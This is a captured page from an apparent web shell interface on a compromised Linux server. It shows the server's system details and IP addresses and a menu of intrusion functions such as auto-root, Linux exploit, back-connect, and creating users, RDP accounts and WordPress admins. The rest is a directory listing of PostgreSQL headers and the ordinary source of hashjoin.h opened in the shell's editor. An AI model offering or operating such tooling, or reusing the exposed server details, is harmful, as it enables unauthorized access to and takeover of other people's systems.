Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
include /
pgsql /
server /
executor /
[ HOME SHELL ]
Name
Size
Permission
Action
execdebug.h
4.32
KB
-rw-r--r--
execdesc.h
2.33
KB
-rw-r--r--
executor.h
14.56
KB
-rw-r--r--
functions.h
1.12
KB
-rw-r--r--
hashjoin.h
7.18
KB
-rw-r--r--
instrument.h
2.79
KB
-rw-r--r--
nodeAgg.h
782
B
-rw-r--r--
nodeAppend.h
701
B
-rw-r--r--
nodeBitmapAnd.h
738
B
-rw-r--r--
nodeBitmapHeapscan.h
813
B
-rw-r--r--
nodeBitmapIndexscan.h
822
B
-rw-r--r--
nodeBitmapOr.h
724
B
-rw-r--r--
nodeCtescan.h
715
B
-rw-r--r--
nodeForeignscan.h
771
B
-rw-r--r--
nodeFunctionscan.h
785
B
-rw-r--r--
nodeGroup.h
716
B
-rw-r--r--
nodeHash.h
1.88
KB
-rw-r--r--
nodeHashjoin.h
890
B
-rw-r--r--
nodeIndexonlyscan.h
920
B
-rw-r--r--
nodeIndexscan.h
1.52
KB
-rw-r--r--
nodeLimit.h
687
B
-rw-r--r--
nodeLockRows.h
729
B
-rw-r--r--
nodeMaterial.h
838
B
-rw-r--r--
nodeMergeAppend.h
771
B
-rw-r--r--
nodeMergejoin.h
743
B
-rw-r--r--
nodeModifyTable.h
768
B
-rw-r--r--
nodeNestloop.h
729
B
-rw-r--r--
nodeRecursiveunion.h
813
B
-rw-r--r--
nodeResult.h
802
B
-rw-r--r--
nodeSeqscan.h
812
B
-rw-r--r--
nodeSetOp.h
687
B
-rw-r--r--
nodeSort.h
766
B
-rw-r--r--
nodeSubplan.h
812
B
-rw-r--r--
nodeSubqueryscan.h
785
B
-rw-r--r--
nodeTidscan.h
812
B
-rw-r--r--
nodeUnique.h
701
B
-rw-r--r--
nodeValuesscan.h
866
B
-rw-r--r--
nodeWindowAgg.h
776
B
-rw-r--r--
nodeWorktablescan.h
799
B
-rw-r--r--
spi.h
5.53
KB
-rw-r--r--
spi_priv.h
3.61
KB
-rw-r--r--
tstoreReceiver.h
767
B
-rw-r--r--
tuptable.h
8.4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : hashjoin.h
/*------------------------------------------------------------------------- * * hashjoin.h * internal structures for hash joins * * * Portions Copyright (c) 1996-2012, PostgreSQL Global Development Group * Portions Copyright (c) 1994, Regents of the University of California * * src/include/executor/hashjoin.h * *------------------------------------------------------------------------- */ #ifndef HASHJOIN_H #define HASHJOIN_H #include "nodes/execnodes.h" #include "storage/buffile.h" /* ---------------------------------------------------------------- * hash-join hash table structures * * Each active hashjoin has a HashJoinTable control block, which is * palloc'd in the executor's per-query context. All other storage needed * for the hashjoin is kept in private memory contexts, two for each hashjoin. * This makes it easy and fast to release the storage when we don't need it * anymore. (Exception: data associated with the temp files lives in the * per-query context too, since we always call buffile.c in that context.) * * The hashtable contexts are made children of the per-query context, ensuring * that they will be discarded at end of statement even if the join is * aborted early by an error. (Likewise, any temporary files we make will * be cleaned up by the virtual file manager in event of an error.) * * Storage that should live through the entire join is allocated from the * "hashCxt", while storage that is only wanted for the current batch is * allocated in the "batchCxt". By resetting the batchCxt at the end of * each batch, we free all the per-batch storage reliably and without tedium. * * During first scan of inner relation, we get its tuples from executor. * If nbatch > 1 then tuples that don't belong in first batch get saved * into inner-batch temp files. The same statements apply for the * first scan of the outer relation, except we write tuples to outer-batch * temp files. After finishing the first scan, we do the following for * each remaining batch: * 1. Read tuples from inner batch file, load into hash buckets. * 2. Read tuples from outer batch file, match to hash buckets and output. * * It is possible to increase nbatch on the fly if the in-memory hash table * gets too big. The hash-value-to-batch computation is arranged so that this * can only cause a tuple to go into a later batch than previously thought, * never into an earlier batch. When we increase nbatch, we rescan the hash * table and dump out any tuples that are now of a later batch to the correct * inner batch file. Subsequently, while reading either inner or outer batch * files, we might find tuples that no longer belong to the current batch; * if so, we just dump them out to the correct batch file. * ---------------------------------------------------------------- */ /* these are in nodes/execnodes.h: */ /* typedef struct HashJoinTupleData *HashJoinTuple; */ /* typedef struct HashJoinTableData *HashJoinTable; */ typedef struct HashJoinTupleData { struct HashJoinTupleData *next; /* link to next tuple in same bucket */ uint32 hashvalue; /* tuple's hash code */ /* Tuple data, in MinimalTuple format, follows on a MAXALIGN boundary */ } HashJoinTupleData; #define HJTUPLE_OVERHEAD MAXALIGN(sizeof(HashJoinTupleData)) #define HJTUPLE_MINTUPLE(hjtup) \ ((MinimalTuple) ((char *) (hjtup) + HJTUPLE_OVERHEAD)) /* * If the outer relation's distribution is sufficiently nonuniform, we attempt * to optimize the join by treating the hash values corresponding to the outer * relation's MCVs specially. Inner relation tuples matching these hash * values go into the "skew" hashtable instead of the main hashtable, and * outer relation tuples with these hash values are matched against that * table instead of the main one. Thus, tuples with these hash values are * effectively handled as part of the first batch and will never go to disk. * The skew hashtable is limited to SKEW_WORK_MEM_PERCENT of the total memory * allowed for the join; while building the hashtables, we decrease the number * of MCVs being specially treated if needed to stay under this limit. * * Note: you might wonder why we look at the outer relation stats for this, * rather than the inner. One reason is that the outer relation is typically * bigger, so we get more I/O savings by optimizing for its most common values. * Also, for similarly-sized relations, the planner prefers to put the more * uniformly distributed relation on the inside, so we're more likely to find * interesting skew in the outer relation. */ typedef struct HashSkewBucket { uint32 hashvalue; /* common hash value */ HashJoinTuple tuples; /* linked list of inner-relation tuples */ } HashSkewBucket; #define SKEW_BUCKET_OVERHEAD MAXALIGN(sizeof(HashSkewBucket)) #define INVALID_SKEW_BUCKET_NO (-1) #define SKEW_WORK_MEM_PERCENT 2 #define SKEW_MIN_OUTER_FRACTION 0.01 typedef struct HashJoinTableData { int nbuckets; /* # buckets in the in-memory hash table */ int log2_nbuckets; /* its log2 (nbuckets must be a power of 2) */ /* buckets[i] is head of list of tuples in i'th in-memory bucket */ struct HashJoinTupleData **buckets; /* buckets array is per-batch storage, as are all the tuples */ bool keepNulls; /* true to store unmatchable NULL tuples */ bool skewEnabled; /* are we using skew optimization? */ HashSkewBucket **skewBucket; /* hashtable of skew buckets */ int skewBucketLen; /* size of skewBucket array (a power of 2!) */ int nSkewBuckets; /* number of active skew buckets */ int *skewBucketNums; /* array indexes of active skew buckets */ int nbatch; /* number of batches */ int curbatch; /* current batch #; 0 during 1st pass */ int nbatch_original; /* nbatch when we started inner scan */ int nbatch_outstart; /* nbatch when we started outer scan */ bool growEnabled; /* flag to shut off nbatch increases */ double totalTuples; /* # tuples obtained from inner plan */ /* * These arrays are allocated for the life of the hash join, but only if * nbatch > 1. A file is opened only when we first write a tuple into it * (otherwise its pointer remains NULL). Note that the zero'th array * elements never get used, since we will process rather than dump out any * tuples of batch zero. */ BufFile **innerBatchFile; /* buffered virtual temp file per batch */ BufFile **outerBatchFile; /* buffered virtual temp file per batch */ /* * Info about the datatype-specific hash functions for the datatypes being * hashed. These are arrays of the same length as the number of hash join * clauses (hash keys). */ FmgrInfo *outer_hashfunctions; /* lookup data for hash functions */ FmgrInfo *inner_hashfunctions; /* lookup data for hash functions */ bool *hashStrict; /* is each hash join operator strict? */ Size spaceUsed; /* memory space currently used by tuples */ Size spaceAllowed; /* upper limit for space used */ Size spacePeak; /* peak space used */ Size spaceUsedSkew; /* skew hash table's current space usage */ Size spaceAllowedSkew; /* upper limit for skew hashtable */ MemoryContext hashCxt; /* context for whole-hash-join storage */ MemoryContext batchCxt; /* context for this-batch-only storage */ } HashJoinTableData; #endif /* HASHJOIN_H */
Close